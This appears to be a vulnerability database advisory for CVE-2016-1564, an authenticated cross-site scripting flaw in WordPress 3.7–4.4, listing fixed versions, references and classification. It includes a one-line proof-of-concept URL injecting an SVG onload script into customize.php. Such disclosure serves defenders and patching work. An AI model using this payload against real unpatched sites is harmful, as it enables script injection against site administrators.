WordPress 3.7-4.4 - Authenticated Cross-Site Scripting (XSS)



Proof of Concept
http://www.example.com/wp-admin/customize.php?theme=<svg onload=alert(1)> (source: https://twitter.com/brutelogic/status/685105483397619713)

Affects WordPresses

Fixed in the following release of each affected branch (3.7 through 4.4):

4.4 branch: fixed in version 4.4.1
4.3 branch: fixed in version 4.3.2
4.2 branch: fixed in version 4.2.6
4.1 branch: fixed in version 4.1.9
4.0 branch: fixed in version 4.0.9
3.9 branch: fixed in version 3.9.10
3.8 branch: fixed in version 3.8.12
3.7 branch: fixed in version 3.7.12

References

CVE CVE-2016-1564
URL https://wordpress.org/news/2016/01/wordpress-4-4-1-security-and-maintenance-release/
URL https://github.com/WordPress/WordPress/commit/7ab65139c6838910426567849c7abed723932b87

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter ethicalhack3r
Submitter Website https://dewhurstsecurity.com/
Submitter Twitter ethicalhack3r
Verified Yes
WPVDB ID 8358

Timeline

Publicly Published 2016-01-06
Added 2016-01-06
Last Updated 2018-08-29
